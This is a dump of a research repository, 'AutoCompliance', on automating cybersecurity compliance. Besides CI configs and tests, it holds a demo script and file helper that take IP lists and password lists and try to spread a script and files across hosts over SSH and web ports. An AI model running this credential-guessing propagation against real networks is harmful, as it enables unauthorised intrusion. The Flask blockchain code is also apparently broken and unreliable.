24 | analyze:
25 | name: Analyze
26 | runs-on: ubuntu-latest
27 | permissions:
28 | actions: read
29 | contents: read
30 | security-events: write
31 |
32 | strategy:
33 | fail-fast: false
34 | matrix:
35 | language: [ python ]
36 | # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ]
37 | # Learn more about CodeQL language support at https://git.io/codeql-language-support
38 |
39 | steps:
40 | - name: Checkout repository
41 | uses: actions/checkout@v2
42 |
43 | # Initializes the CodeQL tools for scanning.
44 | - name: Initialize CodeQL
45 | uses: github/codeql-action/init@v1
46 | with:
47 | languages: ${{ matrix.language }}
48 | # If you wish to specify custom queries, you can do so here or in a config file.
49 | # By default, queries listed here will override any specified in a config file.
50 | # Prefix the list here with "+" to use these queries and those in the config file.
51 | # queries: ./path/to/local/query, your-org/your-repo/queries@main
52 |
53 | # Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
54 | # If this step fails, then you should remove it and run the build manually (see below)
55 | - name: Autobuild
56 | uses: github/codeql-action/autobuild@v1
57 |
58 | # ℹ️ Command-line programs to run using the OS shell.
59 | # 📚 https://git.io/JvXDl
60 |
61 | # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines
62 | # and modify them (or add more) to build your code if your project
63 | # uses a compiled language
64 |
65 | #- run: |
66 | # make bootstrap
67 | # make release
68 |
69 | - name: Perform CodeQL Analysis
70 | uses: github/codeql-action/analyze@v1
71 |
--------------------------------------------------------------------------------
/.github/workflows/codeql-analysis-develop.yml:
--------------------------------------------------------------------------------
1 | # For most projects, this workflow file will not need changing; you simply need
2 | # to commit it to your repository.
3 | #
4 | # You may wish to alter this file to override the set of languages analyzed,
5 | # or to provide custom queries or build logic.
6 | #
7 | # ******** NOTE ********
8 | # We have attempted to detect the languages in your repository. Please check
9 | # the `language` matrix defined below to confirm you have the correct set of
10 | # supported CodeQL languages.
11 | #
12 | name: "CodeQL - Develop"
13 |
14 | on:
15 | push:
16 | branches: [ develop ]
17 | pull_request:
18 | # The branches below must be a subset of the branches above
19 | branches: [ develop ]
20 | schedule:
21 | - cron: '34 22 * * 4'
22 |
23 | jobs:
24 | analyze:
25 | name: Analyze
26 | runs-on: ubuntu-latest
27 | permissions:
28 | actions: read
29 | contents: read
30 | security-events: write
31 |
32 | strategy:
33 | fail-fast: false
34 | matrix:
35 | language: [ python ]
36 | # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ]
37 | # Learn more about CodeQL language support at https://git.io/codeql-language-support
38 |
39 | steps:
40 | - name: Checkout repository
41 | uses: actions/checkout@v2
42 |
43 | # Initializes the CodeQL tools for scanning.
44 | - name: Initialize CodeQL
45 | uses: github/codeql-action/init@v1
46 | with:
47 | languages: ${{ matrix.language }}
48 | # If you wish to specify custom queries, you can do so here or in a config file.
49 | # By default, queries listed here will override any specified in a config file.
50 | # Prefix the list here with "+" to use these queries and those in the config file.
51 | # queries: ./path/to/local/query, your-org/your-repo/queries@main
52 |
53 | # Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
54 | # If this step fails, then you should remove it and run the build manually (see below)
55 | - name: Autobuild
56 | uses: github/codeql-action/autobuild@v1
57 |
58 | # ℹ️ Command-line programs to run using the OS shell.
59 | # 📚 https://git.io/JvXDl
60 |
61 | # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines
62 | # and modify them (or add more) to build your code if your project
63 | # uses a compiled language
64 |
65 | #- run: |
66 | # make bootstrap
67 | # make release
68 |
69 | - name: Perform CodeQL Analysis
70 | uses: github/codeql-action/analyze@v1
71 |
--------------------------------------------------------------------------------
/.github/workflows/codeql-analysis-feature.yml:
--------------------------------------------------------------------------------
1 | # For most projects, this workflow file will not need changing; you simply need
2 | # to commit it to your repository.
3 | #
4 | # You may wish to alter this file to override the set of languages analyzed,
5 | # or to provide custom queries or build logic.
6 | #
7 | # ******** NOTE ********
8 | # We have attempted to detect the languages in your repository. Please check
9 | # the `language` matrix defined below to confirm you have the correct set of
10 | # supported CodeQL languages.
11 | #
12 | name: "CodeQL - Feature"
13 |
14 | on:
15 | push:
16 | branches: [ 24-initial-work-on-the-gui-elements ]
17 | pull_request:
18 | # The branches below must be a subset of the branches above
19 | branches: [ 24-initial-work-on-the-gui-elements ]
20 | schedule:
21 | - cron: '34 22 * * 4'
22 |
23 | jobs:
24 | analyze:
25 | name: Analyze
26 | runs-on: ubuntu-latest
27 | permissions:
28 | actions: read
29 | contents: read
30 | security-events: write
31 |
32 | strategy:
33 | fail-fast: false
34 | matrix:
35 | language: [ python ]
36 | # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ]
37 | # Learn more about CodeQL language support at https://git.io/codeql-language-support
38 |
39 | steps:
40 | - name: Checkout repository
41 | uses: actions/checkout@v2
42 |
43 | # Initializes the CodeQL tools for scanning.
44 | - name: Initialize CodeQL
45 | uses: github/codeql-action/init@v1
46 | with:
47 | languages: ${{ matrix.language }}
48 | # If you wish to specify custom queries, you can do so here or in a config file.
49 | # By default, queries listed here will override any specified in a config file.
50 | # Prefix the list here with "+" to use these queries and those in the config file.
51 | # queries: ./path/to/local/query, your-org/your-repo/queries@main
52 |
53 | # Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
54 | # If this step fails, then you should remove it and run the build manually (see below)
55 | - name: Autobuild
56 | uses: github/codeql-action/autobuild@v1
57 |
58 | # ℹ️ Command-line programs to run using the OS shell.
59 | # 📚 https://git.io/JvXDl
60 |
61 | # ✏️ If the Autobuild fails above, remove it and uncomment the following three lines
62 | # and modify them (or add more) to build your code if your project
63 | # uses a compiled language
64 |
65 | #- run: |
66 | # make bootstrap
67 | # make release
68 |
69 | - name: Perform CodeQL Analysis
70 | uses: github/codeql-action/analyze@v1
71 |
--------------------------------------------------------------------------------
/autocompliance/src/main.py:
--------------------------------------------------------------------------------
1 | # main.py
2 | #
3 | # Copyright 2022 Andrew
4 | #
5 | # This program is free software: you can redistribute it and/or modify
6 | # it under the terms of the GNU General Public License as published by
7 | # the Free Software Foundation, either version 3 of the License, or
8 | # (at your option) any later version.
9 | #
10 | # This program is distributed in the hope that it will be useful,
11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 | # GNU General Public License for more details.
14 | #
15 | # You should have received a copy of the GNU General Public License
16 | # along with this program. If not, see .
17 |
18 | import sys
19 | import gi
20 |
21 | gi.require_version('Gtk', '4.0')
22 |
23 | from gi.repository import Gtk, Gio
24 | from .window import AutocomplianceWindow, AboutDialog
25 |
26 |
27 | class AutocomplianceApplication(Gtk.Application):
28 | """The main application singleton class."""
29 |
30 | def __init__(self):
31 | super().__init__(application_id='org.example.App',
32 | flags=Gio.ApplicationFlags.FLAGS_NONE)
33 | self.create_action('quit', self.quit, ['q'])
34 | self.create_action('about', self.on_about_action)
35 | self.create_action('preferences', self.on_preferences_action)
36 |
37 | def do_activate(self):
38 | """Called when the application is activated.
39 |
40 | We raise the application's main window, creating it if
41 | necessary.
42 | """
43 | win = self.props.active_window
44 | if not win:
45 | win = AutocomplianceWindow(application=self)
46 | win.present()
47 |
48 | def on_about_action(self, widget, _):
49 | """Callback for the app.about action."""
50 | about = AboutDialog(self.props.active_window)
51 | about.present()
52 |
53 | def on_preferences_action(self, widget, _):
54 | """Callback for the app.preferences action."""
55 | print('app.preferences action activated')
56 |
57 | def create_action(self, name, callback, shortcuts=None):
58 | """Add an application action.
59 |
60 | Args:
61 | name: the name of the action
62 | callback: the function to be called when the action is
63 | activated
64 | shortcuts: an optional list of accelerators
65 | """
66 | action = Gio.SimpleAction.new(name, None)
67 | action.connect("activate", callback)
68 | self.add_action(action)
69 | if shortcuts:
70 | self.set_accels_for_action(f"app.{name}", shortcuts)
71 |
72 |
73 | def main(version):
74 | """The application's entry point."""
75 | app = AutocomplianceApplication()
76 | return app.run(sys.argv)
77 |
--------------------------------------------------------------------------------
/.circleci/config.yml:
--------------------------------------------------------------------------------
1 | # Use the latest 2.1 version of CircleCI pipeline process engine.
2 | # See: https://circleci.com/docs/2.0/configuration-reference
3 | version: 2.1
4 |
5 | # Orbs are reusable packages of CircleCI configuration that you may share across projects, enabling you to create encapsulated, parameterized commands, jobs, and executors that can be used across multiple projects.
6 | # See: https://circleci.com/docs/2.0/orb-intro/
7 | orbs:
8 | # The python orb contains a set of prepackaged CircleCI configuration you can use repeatedly in your configuration files
9 | # Orb commands and jobs help you with common scripting around a language/tool
10 | # so you dont have to copy and paste it everywhere.
11 | # See the orb documentation here: https://circleci.com/developer/orbs/orb/circleci/python
12 | python: circleci/python@1.5.0
13 |
14 | # Define a job to be invoked later in a workflow.
15 | # See: https://circleci.com/docs/2.0/configuration-reference/#jobs
16 | jobs:
17 | build-and-test: # This is the name of the job, feel free to change it to better match what you're trying to do!
18 | # These next lines defines a Docker executors: https://circleci.com/docs/2.0/executor-types/
19 | # You can specify an image from Dockerhub or use one of the convenience images from CircleCI's Developer Hub
20 | # A list of available CircleCI Docker convenience images are available here: https://circleci.com/developer/images/image/cimg/python
21 | # The executor is the environment in which the steps below will be executed - below will use a python 3.10.2 container
22 | # Change the version below to your required version of python
23 | docker:
24 | - image: cimg/python:3.10.2
25 | # Checkout the code as the first step. This is a dedicated CircleCI step.
26 | # The python orb's install-packages step will install the dependencies from a Pipfile via Pipenv by default.
27 | # Here we're making sure we use just use the system-wide pip. By default it uses the project root's requirements.txt.
28 | # Then run your tests!
29 | # CircleCI will report the results back to your VCS provider.
30 | steps:
31 | - checkout
32 | - python/install-packages:
33 | pkg-manager: pip
34 | # app-dir: ~/project/package-directory/ # If you're requirements.txt isn't in the root directory.
35 | # pip-dependency-file: test-requirements.txt # if you have a different name for your requirements file, maybe one that combines your runtime and test requirements.
36 | - run:
37 | name: Run tests
38 | # This assumes pytest is installed via the install-package step above
39 | command: pytest
40 |
41 | # Invoke jobs via workflows
42 | # See: https://circleci.com/docs/2.0/configuration-reference/#workflows
43 | workflows:
44 | autocompliance-workflow:
45 | # Inside the workflow, you define the jobs you want to run.
46 | jobs:
47 | - build-and-test
48 |
--------------------------------------------------------------------------------
/autocompliance/src/test_demo_functions.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Author: @andrewk10
4 |
5 | # Import demo_functions to test the demo specific functionality.
6 | import autocompliance.src.demo_functions as demo_functions
7 | # Importing strings for use of the external strings resources.
8 | import autocompliance.src.strings as strings
9 | # Importing strings_functions for string building functions.
10 | import autocompliance.src.strings_functions as strings_functions
11 |
12 |
13 | def test_assigning_values():
14 | """
15 | This function tests the assigning_values function in the net_propagation
16 | script. It uses example arguments to do this stored in strings.py, but
17 | before it does that the bad path is checked by passing in a single argument
18 | with no value to get a runtime error.
19 | """
20 |
21 | # Parsing the arguments and spoofing certain arguments for a forced pass
22 | arguments = demo_functions.parse_arguments([
23 | strings.IP_FILE_OPT_SHORT, strings.IP_LIST_SHORT,
24 | strings.PORT_OPT_SHORT, strings.ALL_PORTS, strings.USERNAME_OPT_SHORT,
25 | strings.ADMIN, strings.PW_FILE_OPT_SHORT, strings.PWDS_LIST_SHORT])
26 |
27 | assigner = demo_functions.DemoFunctions(arguments)
28 | assert assigner.assigning_values() is not None
29 |
30 | # Removing certain arguments for a forced fail
31 | arguments.target = None
32 | arguments.pw_file = None
33 | assigner = demo_functions.DemoFunctions(arguments)
34 | assert assigner.assigning_values() is None
35 |
36 |
37 | def test_exit_and_show_instructions(capfd):
38 | """
39 | This function tests the exit_and_show_instructions function.
40 | Should just run straight through no problem hence why all this function
41 | does is run that function and check what shows up in the console, errors or
42 | exceptions will fail this test for us
43 | :param capfd: Parameter needed to capture log output.
44 | """
45 | demo_functions.exit_and_show_instructions()
46 | out, err = capfd.readouterr()
47 | assert out == strings_functions.help_output() + "\n" + strings.EXITING + \
48 | "\n"
49 |
50 |
51 | def test_remove_duplicates_in_list():
52 | """
53 | This function tests the remove_duplicates_in_list function. Should just run
54 | straight through no problem hence why all this function does is run that
55 | function and check what shows up in the console, errors or exceptions will
56 | fail this test for us
57 | """
58 |
59 | list_with_duplicates = list()
60 | list_with_duplicates.append(strings.CONSENSUS_MESSAGE_CHANGE_VIEW_REQUEST)
61 | list_with_duplicates.append(strings.CONSENSUS_MESSAGE_CHANGE_VIEW_REQUEST)
62 | list_with_duplicates.append(strings.CONSENSUS_MESSAGE_COMMIT)
63 |
64 | list_without_duplicates = list()
65 | list_without_duplicates.append(strings.
66 | CONSENSUS_MESSAGE_CHANGE_VIEW_REQUEST)
67 | list_without_duplicates.append(strings.CONSENSUS_MESSAGE_COMMIT)
68 |
69 | assert demo_functions.remove_duplicates_in_list(list_with_duplicates) == \
70 | list_without_duplicates
71 |
--------------------------------------------------------------------------------
/autocompliance/src/test_file.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Author: @andrewk10
4 |
5 | # Importing file for file based functionality
6 | import autocompliance.src.file as file
7 | # Importing strings for common string resources.
8 | import autocompliance.src.strings as strings
9 | # Importing strings_functions for dynamic string functionality.
10 | import autocompliance.src.strings_functions as strings_functions
11 | # Importing demo functions for the parsing of arguments.
12 | import autocompliance.src.demo_functions as demo_functions
13 |
14 |
15 | def test_append_lines_from_file_to_list():
16 | """
17 | This function tests the append_lines_from_file_to_list function in the
18 | net_propagation script. It feeds in a test file, and we check the result it
19 | returns for validity. Each line is checked independently without a for loop
20 | for readability in test results i.e. we'll be able to correlate a specific
21 | line with an error.
22 | """
23 | test_file = file.File(strings.FILE)
24 | lines_list = test_file.append_lines_from_file_to_list()
25 | assert lines_list[0] == strings.LINES[0]
26 | assert lines_list[1] == strings.LINES[1]
27 | assert lines_list[2] == strings.LINES[2]
28 | assert lines_list[3] == strings.LINES[3]
29 | assert lines_list[4] == strings.LINES[4]
30 | assert lines_list[5] == strings.LINES[5]
31 |
32 |
33 | def test_check_transfer_file():
34 | """
35 | This function tests the check_transfer_file function. Only runs through the
36 | function with web and ssh ports making sure no errors are encountered.
37 | """
38 | test_file = file.File(strings.IP_LIST_SHORT)
39 | arguments = demo_functions.parse_arguments([strings.PROP_OPT_SHORT])
40 | test_file.check_transfer_file(
41 | arguments, strings.LOOPBACK_IP, strings.SSH_PORT, strings.ADMIN)
42 | test_file.check_transfer_file(
43 | arguments, strings.LOOPBACK_IP, strings.WEB_PORT_EIGHTY, strings.ADMIN)
44 |
45 |
46 | def test_convert_file_to_list():
47 | """
48 | This function tests the convert_file_to_list function, it does this by
49 | passing in one valid filename and one invalid filename.
50 | """
51 | test_file = file.File(strings.IP_LIST_SHORT)
52 | assert test_file.convert_file_to_list() is not None
53 | test_file = file.File(strings.PWDS_LIST_SHORT)
54 | assert test_file.convert_file_to_list() is not None
55 | test_file = file.File(strings.TEST_IP)
56 | assert test_file.convert_file_to_list() is None
57 |
58 |
59 | def test_file_error_handler(capfd):
60 | """
61 | This function tests the file_error_handler function. Should just run
62 | straight through no problem hence why all this function does is run that
63 | function and check what shows up in the console, errors or exceptions will
64 | fail this test for us as well as a change to the string function itself
65 | :param capfd: Parameter needed to capture log output.
66 | """
67 | test_file = file.File(strings.FILE)
68 | test_file.file_error_handler()
69 | out, err = capfd.readouterr()
70 | assert out == strings_functions.help_output() + "\n" + strings.EXITING + \
71 | "\n"
72 |
--------------------------------------------------------------------------------
/autocompliance/src/blockchain_functions.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Author: @andrewk10
4 |
5 | # This code is for the generic blockchain functions.
6 |
7 | # Using flask to send messages to postman.
8 | from flask import Flask, jsonify
9 | # Importing blockchain for the blockchain object
10 | import autocompliance.src.blockchain as blockchain
11 | # Importing json to encode information as JSON.
12 | import json
13 | # Hashlib for the hashing of blockchain blocks.
14 | import hashlib
15 |
16 | app = Flask(__name__)
17 | app_blockchain = blockchain.Blockchain()
18 |
19 |
20 | @app.route('/broadcast_recovery', methods=['GET'])
21 | def broadcast_recovery_request():
22 | """
23 | This function is called via web request
24 | """
25 | # for block in app_blockchain:
26 | #
27 |
28 |
29 | @app.route('/get_proof', methods=['GET'])
30 | def delegated_byzantine_fault_tolerance(previous_proof):
31 | new_proof = 1
32 | check_proof = False
33 | while check_proof is False:
34 | hash_operation = hashlib.sha256(str(
35 | new_proof ** 2 - previous_proof ** 2).encode()).hexdigest()
36 | if hash_operation[:4] == '0000':
37 | check_proof = True
38 | else:
39 | new_proof += 1
40 | return new_proof
41 |
42 |
43 | @app.route('/get_chain', methods=['GET'])
44 | def get_chain():
45 | response = {'chain': app_blockchain.chain,
46 | 'length': len(app_blockchain.chain)}
47 | return jsonify(response), 200
48 |
49 |
50 | @app.route('/get_hash_block', methods=['GET'])
51 | def hash_block(block):
52 | encoded_block = json.dumps(block, sort_keys=True).encode()
53 | return hashlib.sha256(encoded_block).hexdigest()
54 |
55 |
56 | @app.route('/chain_valid', methods=['GET'])
57 | def is_chain_valid(chain):
58 | previous_block = chain[0]
59 | block_index = 1
60 | while block_index < len(chain):
61 | block = chain[block_index]
62 | if block["previous_hash"] != hash(previous_block):
63 | return False
64 |
65 | previous_proof = previous_block['proof']
66 |
67 | current_proof = block['proof']
68 |
69 | hash_operation = hashlib.sha256(str(
70 | current_proof ** 2 - previous_proof ** 2).encode()).hexdigest()
71 | if hash_operation[:4] != '0000':
72 | return False
73 | previous_block = block
74 | block_index += 1
75 | return True
76 |
77 |
78 | @app.route('/mine_block', methods=['GET'])
79 | def mine_block():
80 | previous_block = app_blockchain.get_previous_block()
81 | previous_proof = previous_block['proof']
82 | proof = delegated_byzantine_fault_tolerance(previous_proof)
83 | previous_hash = hash(previous_block)
84 |
85 | block = app_blockchain.create_blockchain(proof, previous_hash)
86 | response = {'message': 'Block mined!',
87 | 'index': block['index'],
88 | 'timestamp': block['timestamp'],
89 | 'proof': block['proof'],
90 | 'previous_hash': block['previous_hash']}
91 | return jsonify(response), 200
92 |
93 |
94 | app.run(host='127.0.0.1', port=5000)
95 |
--------------------------------------------------------------------------------
/autocompliance/src/test_strings_functions.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Author: @andrewk10
4 |
5 | # Importing strings_functions.py for testing.
6 | import autocompliance.src.strings_functions as strings_functions
7 | # Importing strings for the use of predefined test strings.
8 | import autocompliance.src.strings as strings
9 |
10 |
11 | def test_adding_address_to_interface(capfd):
12 | """
13 | This function tests the adding_address_to_interface function.
14 | Should just run straight through no problem hence why all this function
15 | does is run that function and check what shows up in the console, errors or
16 | exceptions will fail this test for us as well as a change to the string
17 | function itself
18 | :param capfd: Parameter needed to capture log output.
19 | """
20 | print(strings_functions.adding_address_to_interface(strings.TEST_IP,
21 | strings.LOOPBACK))
22 | out, err = capfd.readouterr()
23 | assert out == strings.ADDING + strings.SPACE + strings.TEST_IP + \
24 | strings.SPACE + strings.FROM_INTERFACE + strings.SPACE + \
25 | strings.LOOPBACK + strings.INTERFACE_SUBNET + "\n"
26 |
27 |
28 | def test_cat_file(capfd):
29 | """
30 | This function tests the cat_file function. Should just run straight through
31 | no problem hence why all this function does is run that function and check
32 | what shows up in the console, errors or exceptions will fail this test for
33 | us as well as a change to the string function itself
34 | :param capfd: Parameter needed to capture log output.
35 | """
36 | print(strings_functions.cat_file(strings.FILE))
37 | out, err = capfd.readouterr()
38 | assert out == strings.CAT + strings.SPACE + strings.FILE + "\n"
39 |
40 |
41 | def test_checking_ip_reachable(capfd):
42 | """
43 | This function tests the checking_ip_reachable function. Should just run
44 | straight through no problem hence why all this function does is run that
45 | function and check what shows up in the console, errors or exceptions will
46 | fail this test for us as well as a change to the string function itself
47 | :param capfd: Parameter needed to capture log output.
48 | """
49 | print(strings_functions.checking_ip_reachable(strings.TEST_IP))
50 | out, err = capfd.readouterr()
51 | assert out == strings.IS_IP_REACHABLE + strings.SPACE + strings.TEST_IP + \
52 | "\n"
53 |
54 |
55 | def test_ip_reachability(capfd):
56 | """
57 | This function tests the ip_reachability function. Should just run straight
58 | through no problem hence why all this function does is run that function
59 | and check what shows up in the console for both a reachable and
60 | unreachable IP, errors or exceptions will fail this test for us as well as
61 | a change to the string function itself
62 | :param capfd: Parameter needed to capture log output.
63 | """
64 | permutations = [True, False]
65 | for permutation in permutations:
66 | print(strings_functions.ip_reachability(strings.TEST_IP, permutation))
67 | out, err = capfd.readouterr()
68 | if permutation:
69 | assert out == strings.TEST_IP + strings.SPACE + \
70 | strings.WAS_REACHABLE + strings.FULL_STOP + "\n"
71 | else:
72 | assert out == strings.TEST_IP + strings.SPACE + \
73 | strings.WAS_NOT_REACHABLE + strings.FULL_STOP + "\n"
74 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | [](https://www.codefactor.io/repository/github/andrewk10/autocompliance)
2 |
3 | # AutoCompliance
4 | Automating the Implementation of a Cybersecurity Governance, Risk and Compliance Programme using Distributed Ledger Technologies
5 |
6 | # Research Questions and Deliverables (WIP)
7 | 1. Can DLTs help implement a GRC programme better than other means?
8 | - [ ] A comparison report of DLT performance compared to the conventional means for implementing a GRC programme.
9 | - [ ] DLT solution(s) that assist with the implementation of a GRC programme in any given organisation.
10 | 2. Is there anything that can’t or should not be automated in the implementation? Why?
11 | - [ ] A breakdown on all items that can not be automated with in depth technical analysis as to why that is the case.
12 | 3. Are existing implementation solutions suitable or is there more work to be done?
13 | - [ ] A definition on what is to be classified as “suitable”.
14 | - [ ] An outline of all that needs to be done to reach a suitable state.
15 | 4. What possible future technical developments need to be accounted for in the GRC space?
16 | - [ ] A list of future technical areas and a description on how they should be accounted for in the future.
17 | 5. Is machine learning the best way towards total zero trust security solutions?
18 | - [ ] A comparison report of ML performance compared to the conventional means for implementing zero trust security in an organisation’s network.
19 | - [ ] ML solution(s) that assist with the implementation of a zero trust security network in any given organisation.
20 |
21 |
22 | # Project Abstract
23 | This project takes a look at how to automate the implementation of a programme of Cybersecurity governance, risk management and compliance in any given organisation through the use of Distributed Ledger Technologies. A comprehensive review of relevant and appropriate literature has been undertook to inform the knowledge contained within the report. Consideration has been given for Cybersecurity and governance frameworks, risk management frameworks as well as global laws and regulations. Generic security missions, visions and values have been outlined to better inform the identification of GRC requirements for any given organisation. Using various professional practices that dynamically apply to any given organisation, a plan is to be automatically outlined and executed to implement the aforementioned programme of Cybersecurity governance, risk management and compliance using Distributed Ledger Technologies.
24 |
25 | The report has been broken down into several sections for this. These sections are the
26 | introduction, background research, Cybersecurity GRC requirements, implementation
27 | approach and conclusions. The introduction sets the scene for the project. Background
28 | research examines the legal and regulatory issues relevant to different kinds of organisations as well as governance and risk management frameworks that may be of assistance when implementing a programme of Cybersecurity governance, risk and compliance in the organisation. In the Cybersecurity GRC requirements section various kinds of organisations are introduced and so too are the GRC requirements of each kind of organisation. A description of how Cybersecurity governance, risk management and compliance could be implemented using Distributed Ledger Technologies in a given organisation type is covered in the implementation approach. Finally, the conclusion enumerates on the conclusions of this project.
29 |
30 | The following frameworks are covered and implemented within this project to some extent; NIST, OSSTMM, PMMM, PMBoK, COBIT, ISO/IEC 27014:2020, National Cyber
31 | Security Strategy - Government of Ireland, NIST RMF, ISO/IEC 27005:2018, CMMC,
32 | GDPR, PCI DSS, ENISA Strategy, AT-101 (SOC2), ISO 9001:2015 and ISO/IEC 27001:-
33 | 2013.
34 |
--------------------------------------------------------------------------------
/autocompliance/src/demo.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Author: @andrewk10
4 |
5 | # Importing demo_functions for demo specific functionality.
6 | import autocompliance.src.demo_functions as demo_functions
7 | # Importing file for working with files.
8 | import autocompliance.src.file as file
9 | # Importing logging to safely log sensitive, error or debug info.
10 | import logging
11 | # Importing net_propagation for propagating across the network.
12 | import autocompliance.src.net_propagation as net_propagation
13 | # Importing strings for use of the external strings resources.
14 | import autocompliance.src.strings as strings
15 | # Importing sys to handle arguments
16 | import sys
17 |
18 |
19 | def demo():
20 | """
21 | This demo function is just for demo purposes.
22 | """
23 | # Parsing the arguments.
24 | arguments = demo_functions.parse_arguments(sys.argv[1:])
25 |
26 | # Initialising this for possible later use
27 | transfer_file = strings.SPACE
28 |
29 | # If there is no arguments then just print the help menu and exit.
30 | if len(sys.argv) <= 1:
31 | demo_functions.exit_and_show_instructions()
32 | sys.exit(-1)
33 |
34 | propagator = net_propagation.NetPropagation('', '', '', '', '', [], [])
35 |
36 | # Validating and assigning values based on arguments passed in.
37 | demo_functionality = demo_functions.DemoFunctions(arguments)
38 | valid_values = demo_functionality.checking_arguments()
39 | # If they are invalid values...
40 | if valid_values is None:
41 | # Show the user instructions and exit gracefully.
42 | demo_functions.exit_and_show_instructions()
43 | sys.exit(-1)
44 |
45 | ip_file = file.File(arguments.target)
46 | # The end user specified a local scan must be executed, the result of the
47 | # local scan will extend the current ip_list.
48 | if arguments.target:
49 | # Extending the ip_list with the ip list.
50 | propagator.ip_list.extend(ip_file.convert_file_to_list())
51 |
52 | # Check if the lan option was provided.
53 | # If so then extend the ip_list.
54 | if arguments.lan:
55 | logging.info(strings.PERFORMING_LOCAL_SCAN)
56 | propagator.gathering_local_ips()
57 |
58 | # Creating the password file.
59 | pw_file = file.File(arguments.pw_file)
60 | try:
61 | # Here I made sure the user actually gave a valid file for the
62 | # passwords list. If they have...
63 | pw_file.validate_file_exists()
64 | # A list of passwords is created.
65 | propagator.password_list = pw_file.convert_file_to_list()
66 |
67 | except RuntimeError:
68 | # File doesn't exist, alert the user and exit gracefully, so
69 | # they can possibly fix their mistake.
70 | pw_file.file_error_handler()
71 | sys.exit(-1)
72 |
73 | # If the user wants to transfer a file, then we do the following...
74 | if arguments.propagate_file:
75 | try:
76 | # Again making sure the transfer file actually exits, just like
77 | # the password file above.
78 | transfer_file = file.File(arguments.propagate_file)
79 | transfer_file.validate_file_exists()
80 | except RuntimeError:
81 | # File doesn't exist, throw an error and give the user a chance to
82 | # try again.
83 | transfer_file = file.File(arguments.propagate_file)
84 | transfer_file.file_error_handler()
85 | sys.exit(-1)
86 |
87 | # Removing duplicate entries in the IP address list, can come from
88 | # combining local scan with given IP addresses in an ip address file for
89 | # example. This would be a user error, we're just handling that.
90 | if propagator.ip_list:
91 | propagator.ip_list = demo_functions.remove_duplicates_in_list(
92 | propagator.ip_list)
93 |
94 | # Removing IPs from the IP list that can't be pinged from the host machine
95 | # of the script.
96 | propagator.remove_unreachable_ips()
97 | # Getting a list of ports by splitting the target ports specified by the
98 | # user on the comma.
99 | ports = arguments.ports.split(strings.COMMA)
100 | # Cycling through every IP in the IP list...
101 | if propagator.ip_list:
102 | for ip in propagator.ip_list:
103 | # And then using all user specified ports against that specific
104 | # IP...
105 | for port in ports:
106 | propagator.ip = ip
107 | propagator.port = port
108 | propagation_script = file.File(strings.DEMO_SCRIPT_FILENAME)
109 | # Try to spread using services and actions.
110 | propagator.try_action(transfer_file, propagation_script,
111 | arguments)
112 |
113 |
114 | if __name__ == "__main__":
115 | demo()
116 |
--------------------------------------------------------------------------------
/autocompliance/src/file.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Author: @andrewk10
4 |
5 | # Importing demo_functions for the demo specific functionality.
6 | import autocompliance.src.demo_functions as demo_functions
7 | # Importing logging to safely log sensitive, error or debug info.
8 | import logging
9 | # For net_propagation related functionality.
10 | import autocompliance.src.net_propagation as net_propagation
11 | # Import os for path checking.
12 | import os
13 | # Importing strings for use of the external strings resources.
14 | import autocompliance.src.strings as strings
15 | # Importing strings_functions for string building functions.
16 | import autocompliance.src.strings_functions as strings_functions
17 | # Importing subprocess for running commands.
18 | import subprocess
19 |
20 |
21 | class File:
22 | """
23 | Stores a file along with its properties and allows the file to be
24 | manipulated
25 | """
26 |
27 | def __init__(self, filename):
28 | """
29 | Object parameters being initialised
30 | :param filename: The filename of the file that needs to be converted to
31 | a list
32 | :param filename: The filename of the file, can include the path
33 | """
34 | self.filename = filename
35 |
36 | def append_lines_from_file_to_list(self):
37 | """
38 | This function will read a file and return the lines (minus the newline
39 | character) as a list
40 | :return lines_list: The lines themselves.
41 | """
42 | lines_list = []
43 | with open(self.filename) as file:
44 | for line in file:
45 | lines_list.append(line.rstrip())
46 | return lines_list
47 |
48 | def check_transfer_file(self, arguments, ip, port, login_details):
49 | """
50 | This function attempts transferring a user specified file across the
51 | network. If it succeeds we alert the user and let them know
52 | transferring the file was a success and over what service. If it is
53 | unsuccessful then we let the user know it was unsuccessful and over
54 | what service. Should the user have never asked for a file to be
55 | transferred over the network then we let them know this process will
56 | not be done
57 | :param arguments: The arguments passed in by the user themselves
58 | :param ip: The IP address we wish to propagate to
59 | :param port: The port we're propagating through
60 | :param login_details: The username and password string combo
61 | """
62 | if arguments.propagate_file and (str(port) == strings.SSH_PORT):
63 | transferred = self.transfer_file(ip, port, login_details)
64 | if transferred:
65 | logging.info(strings.TRANSFER_SUCCESS_SSH)
66 | else:
67 | logging.debug(strings.TRANSFER_FAILURE_SSH)
68 | else:
69 | logging.info(strings.DO_NOT_TRANSFER)
70 |
71 | def convert_file_to_list(self):
72 | """
73 | This function will convert a given file specified by a filename to a
74 | list and will then proceed to return that list
75 | :return file_as_list: The list of the lines from the file
76 | """
77 | try:
78 | file_as_list = self.append_lines_from_file_to_list()
79 | return file_as_list
80 | except FileNotFoundError:
81 | logging.error(strings.FILE_DOES_NOT_EXIST)
82 | return None
83 |
84 | def file_error_handler(self):
85 | """
86 | This function handles errors related to the processing of files.
87 | """
88 | logging.error(strings_functions.filename_processing_error(
89 | self.filename))
90 | demo_functions.exit_and_show_instructions()
91 |
92 | def file_not_exist(self, ip, port, username, password):
93 | """
94 | This function will check whether this file exists on a target
95 | machine and how it does that is dependent on the port being passed in
